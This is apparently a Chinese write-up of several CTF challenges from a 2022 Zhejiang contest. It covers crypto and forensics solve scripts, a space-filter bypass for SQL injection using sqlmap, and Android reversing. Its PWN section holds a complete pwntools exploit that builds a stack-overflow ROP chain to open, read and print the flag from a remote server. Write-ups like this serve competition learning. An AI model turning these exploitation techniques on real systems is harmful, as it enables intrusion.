2022浙江省决

babysql:直接输入框按照常规思路进行注入,发现把空格给禁了,直接用sqlmap的space2comment模块跑

图片

math:

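"""Solve script for the "math" challenge.

The ciphertext is an affine substitution over a 38-symbol alphabet,
computed modulo 37: plaintext index = (cipher index - 7) * key^-1 mod 37.
Only key mod 37 matters, so the huge n is reduced before inverting.
"""

ALPHABET = 'abcdefghijklmnopqrstuvwxyz0123456789+='
MODULUS = 37
SHIFT = 7

n = 176778040837484895481963794918312894811914463587783883976856801676290821243853364789418908640505211936881707629753845875997805883248035576046706978993073043757445726165605877196383212378074705385178610178824713153854530726380795438083708575716562524587045312909657881223522830729052758566504582290081411626333
key = n - 1
c = 'u66hp7nuh01puoaip10pi6o0vzavnu11'


def _modinv(a, m):
    """Return the inverse of *a* modulo *m* (extended Euclid).

    Equivalent to ``pow(a, -1, m)`` on Python 3.8+; kept dependency-free so
    the script does not need gmpy2.

    Raises:
        ValueError: if *a* and *m* are not coprime.
    """
    t, new_t, r, new_r = 0, 1, m, a % m
    while new_r:
        q = r // new_r
        t, new_t = new_t, t - q * new_t
        r, new_r = new_r, r - q * new_r
    if r != 1:
        raise ValueError("no modular inverse: %d and %d are not coprime" % (a, m))
    return t % m


def decrypt(ciphertext, key, alphabet=ALPHABET, modulus=MODULUS, shift=SHIFT):
    """Undo the affine substitution for every symbol of *ciphertext*.

    Args:
        ciphertext: string of symbols drawn from *alphabet*.
        key: multiplier used during encryption (only key mod modulus matters).
        alphabet: symbol table; its index is the numeric value of a symbol.
        modulus: modulus of the affine map (37 here, even though the alphabet has 38 symbols).
        shift: additive constant of the affine map.

    Returns:
        The decrypted string, same length as *ciphertext*.

    Raises:
        ValueError: if a symbol is not in *alphabet* or *key* is not invertible.
    """
    inv = _modinv(key, modulus)
    # Python's % keeps the result non-negative, so (idx - shift) may be negative safely.
    return ''.join(
        alphabet[(alphabet.index(ch) - shift) * inv % modulus] for ch in ciphertext
    )


flag = decrypt(c, key)
print(flag)
#DASCTF{799a03b7a82076f5028059681df1b722}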

rssssa5:

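"""Solve script for "rssssa5" (run under SageMath, not plain Python).

The given p is only the low part of the prime (everything below bit 560);
Coppersmith's small_roots on x * 2**560 + p_low recovers the missing high
part, after which RSA decryption is routine.
"""
import gmpy2
from Crypto.Util.number import *

n = 21595945409392994055049935446570173194131443801801845658035469673666023560594683551197545038999238700810747167248724184844583697034436158042499504967916978621608536213230969406811902366916932032050583747070735750876593573387957847683066895725722366706359818941065483471589153682177234707645138490589285500875222568286916243861325846262164331536570517513524474322519145470883352586121892275861245291051589531534179640139953079522307426687782419075644619898733819937782418589025945603603989100805716550707637938272890461563518245458692411433603442554397633470070254229240718705126327921819662662201896576503865953330533
c = 1500765718465847687738186396037558689777598727005427859690647229619648539776087318379834790898189767401195002186003548094137654979353798325221367220839665289140547664641612525534203652911807047718681392766077895625388064095459224402032253429115181543725938853591119977152518616563668740574496233135226296439754690903570240135657268737729815911404733486976376064060345507410815912670147466261149162470191619474107592103882894806322239740349433710606063058160148571050855845964674224651003832579701204330216602742005466066589981707592861990283864753628591214636813639371477417319679603330973431803849304579330791040664
p_low = 1426723861968216959675536598409491243380171101180592446441649834738166786277745723654950385796320682900434611832789544257790278878742420696344225394624591657752431494779
e = 0x10001

PR.<x> = PolynomialRing(Zmod(n))
f = x * 2 ** 560 + p_low
f = f.monic()
# Sage's method is small_roots (plural) and the keyword is epsilon; the
# misspelt small_root(..., epslion=...) raises before anything is computed.
root = f.small_roots(X=2^464, beta=0.45, epsilon=0.05)
if not root:
    raise ValueError("small_roots found no root; adjust X/beta/epsilon")
p = int(root[0]) * 2 ** 560 + p_low
assert n % p == 0, "recovered p does not divide n"
q = n // p
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
m = int(pow(c, d, n))
print(long_to_bytes(m))
#DASCTF{ce73935b2e83a78aa5079a9e59ae4980}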
#DASCTF{ce73935b2e83a78aa5079a9e59ae4980}

checkin_gift:

binwalk文件能发现存在两个jpg文件,用010打开搜索jpg的文件头,发现base64,用cyberchef直接解出

图片

m4a:

把m4a文件添加m4a后缀名,可得到摩斯密码音频文件,听了后解码可得到一段字符

BA43BCEFC204。接着把附件放到010里,拉到最后可发现存在一个倒置的zip压缩包。

用脚本逆一下加上zip后缀得到压缩包

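def reverse_file(src, dst):
    """Write the bytes of *src* to *dst* in reverse order.

    The challenge file carries the zip archive byte-reversed at its end, so
    reversing the whole file yields an archive that opens once renamed to .zip.
    Both files are handled by a single ``with`` so they are closed on error too.

    Args:
        src: path of the file to reverse (read as binary).
        dst: path of the output file (overwritten, written as binary).

    Raises:
        OSError: if either file cannot be opened.
    """
    with open(src, 'rb') as f, open(dst, 'wb') as g:
        g.write(f.read()[::-1])


if __name__ == "__main__":
    reverse_file('m4a', 'flag')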

提示需要密码,输入之前获得的字符,得到txt文本。拿去cyberchef解码,得到flag
Unkn0wnData图片

Unkn0wnData:

图片尾存在base64,然后解码能得到where is key和一串表情,可推测是aes-emoji

然后图片lsb zsteg可得到一串zip的hex 和上面的base64

将zip放入winhex存储为压缩包,打开是流量的txt文件,用脚本解码可得

1.py

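"""Step 1 of the Unkn0wnData keystroke decode.

Reformats the 16-hex-digit USB HID reports in key.txt into colon-separated
byte pairs ("xx:xx:xx:xx:xx:xx:xx:xx") in out.txt, the form 2.py expects.
"""


def format_report(report):
    """Return a 16-hex-digit report as "xx:xx:xx:xx:xx:xx:xx:xx"."""
    return ":".join(report[i:i + 2] for i in range(0, len(report), 2))


def format_reports(lines):
    """Yield the formatted form of every line that is exactly 16 characters long.

    Lines of any other length (including blank ones) are skipped; a blank
    line no longer terminates the run, so a dump with an empty line in the
    middle is processed to the end.
    """
    for raw in lines:
        line = raw.strip()
        if len(line) == 16:
            yield format_report(line)


def convert(src='key.txt', dst='out.txt'):
    """Read reports from *src* and write the formatted lines to *dst*.

    Raises:
        OSError: if either file cannot be opened.
    """
    with open(src, 'r') as f, open(dst, 'w') as fi:
        for line in format_reports(f):
            fi.write(line)
            fi.write('\n')


if __name__ == "__main__":
    convert()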

2.py

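"""Step 2 of the Unkn0wnData keystroke decode.

Reads the colon-separated USB HID keyboard reports written by 1.py
(out.txt), maps each single-key report to a keystroke token, then applies
backspaces and Caps Lock to reconstruct what was typed.
"""

# HID usage id (hex, as two lowercase digits) -> token, no modifier held.
normalKeys = {
    "04": "a", "05": "b", "06": "c", "07": "d", "08": "e",
    "09": "f", "0a": "g", "0b": "h", "0c": "i", "0d": "j",
    "0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o",
    "13": "p", "14": "q", "15": "r", "16": "s", "17": "t",
    "18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y",
    "1d": "z", "1e": "1", "1f": "2", "20": "3", "21": "4",
    "22": "5", "23": "6", "24": "7", "25": "8", "26": "9",
    "27": "0", "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t",
    "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[", "30": "]", "31": "\\",
    "32": "<NON>", "33": ";", "34": "'", "35": "<GA>", "36": ",", "37": ".",
    "38": "/", "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>",
    "3e": "<F5>", "3f": "<F6>", "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>",
    "44": "<F11>", "45": "<F12>"}

# Same usage ids with the left-shift modifier (report byte 0 == 02).
shiftKeys = {
    "04": "A", "05": "B", "06": "C", "07": "D", "08": "E",
    "09": "F", "0a": "G", "0b": "H", "0c": "I", "0d": "J",
    "0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O",
    "13": "P", "14": "Q", "15": "R", "16": "S", "17": "T",
    "18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y",
    "1d": "Z", "1e": "!", "1f": "@", "20": "#", "21": "$",
    "22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")",
    "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>",
    "2d": "_", "2e": "+", "2f": "{", "30": "}", "31": "|", "32": "<NON>", "33": "\"",
    "34": ":", "35": "<GA>", "36": "<", "37": ">", "38": "?", "39": "<CAP>", "3a": "<F1>",
    "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>", "40": "<F7>",
    "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}


def _single_key_report(fields):
    """Return True for a report that carries exactly one key press.

    *fields* is the report split on ':'. Accepted reports have modifier byte
    "00" or "02" (none / left shift), a zero reserved byte, a non-zero first
    keycode and all remaining keycode slots zero; anything else (key release,
    chords, malformed lines) is ignored, as the original filter did.
    """
    if len(fields) != 8:
        return False
    modifier, reserved, keycode = fields[0], fields[1], fields[2]
    if modifier not in ("00", "02") or reserved != "00" or keycode == "00":
        return False
    return all(slot == "00" for slot in fields[3:])


def decode_reports(lines):
    """Map each single-key report line to its keystroke token.

    Args:
        lines: iterable of "xx:xx:xx:xx:xx:xx:xx:xx" strings (trailing
            newline allowed).

    Returns:
        List of tokens; unknown keycodes become '[unknown]'.
    """
    tokens = []
    for line in lines:
        fields = line.strip().split(":")
        if not _single_key_report(fields):
            continue
        table = shiftKeys if fields[0] == "02" else normalKeys
        tokens.append(table.get(fields[2], '[unknown]'))
    return tokens


def apply_backspaces(tokens):
    """Return *tokens* with every '<DEL>' and the keystroke before it removed.

    A '<DEL>' with nothing before it is simply dropped (the index-based
    version deleted the *last* token in that case).
    """
    typed = []
    for token in tokens:
        if token == '<DEL>':
            if typed:
                typed.pop()
        else:
            typed.append(token)
    return typed


def apply_capslock(tokens):
    """Return *tokens* without '<CAP>' markers, upper-casing keystrokes typed
    while Caps Lock was toggled on.

    Done as a single pass over a fresh list, so no index arithmetic on a
    list that is being mutated.
    """
    caps_on = False
    result = []
    for token in tokens:
        if token == '<CAP>':
            caps_on = not caps_on
            continue
        result.append(token.upper() if caps_on else token)
    return result


def main(path='out.txt'):
    """Decode *path* and print the raw and the post-processed keystroke strings."""
    with open(path) as keys:
        output = decode_reports(keys)
    print("".join(output))
    output = apply_capslock(apply_backspaces(output))
    print('output :' + "".join(output))


if __name__ == "__main__":
    main()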

用以上两个脚本先后解码可得
图片

可得密钥为Toggled

拿去aes-emoji解码

把以上的表情和密钥解码可得flag

DASCTF{ad15eecd2978bc5c70597d14985412c4}

 

 

PWN

GO-MAZE-v4

走完地图发现输出的是假flag,但是后门还是存在一个出入点,于是输入大量垃圾数据,发现程序崩溃,所以猜测存在栈溢出漏洞,然后静态分析,通过关键字符串可以定位到这里

图片

这里其实给了提示,v14这个参数存在溢出,然后就是构造rop链打orw。

exp:

 from pwn import * from time import * context.log_level='debug' #p=process('./pwn') p=remote('1.14.97.218', 26200) elf=ELF('./pwn') ​ poprax=0x400a4f syscall=0x4025ab poprdi=0x4008f6 poprsi=0x40416f poprdx=0x51d4b6 poprbx=0x402498 popdxsi=0x51d559 buf=0x98a000 leave=0x4015cb ​ rop=b'' rop=p64(poprdi)+p64(0)+p64(popdxsi)+p64(0x100)+p64(buf+0x300)+p64(syscall)+p64(leave) ​ payload=p64(0)+p64(poprax)+p64(2)+p64(poprdi)+p64(elf.search(b'flag').__next__())+p64(poprsi)+p64(0)+p64(syscall) payload+=p64(poprax)+p64(0)+p64(poprdi)+p64(3)+p64(poprsi)+p64(buf)+p64(poprdx)+p64(0x100)+p64(syscall) payload+=p64(poprax)+p64(1)+p64(poprdi)+p64(1)+p64(poprsi)+p64(buf)+p64(poprdx)+p64(0x100)+p64(syscall) ​ def maps():    p.sendline(b's')    p.sendline(b's')    p.sendline(b's')    p.sendline(b's')    p.sendline(b'd')    p.sendline(b'd')    p.sendline(b'd')    p.sendline(b'w')    p.sendline(b'w')    p.sendline(b'w')    p.sendline(b'd')    p.sendline(b'd')    p.sendline(b'd')    p.sendline(b'w')    p.sendline(b'd')    p.sendline(b'w')    p.sendline(b'w') ​ def pwn():    p.recvuntil('flag')    p.sendline(b'a'*0x178+p64(buf+0x300)+rop)    p.send(payload) ​ maps() pwn() p.interactive()

RE

ezandroid

逆向后mainactivity如下图所示

图片

可以看到账号密码输入成功后进入afterlog

afterlog如下图所示

2

就放了一个视图,然后进入这个视图

图片

可以看到背景是一张图片,最后解压缩出图片可以看到flag

图片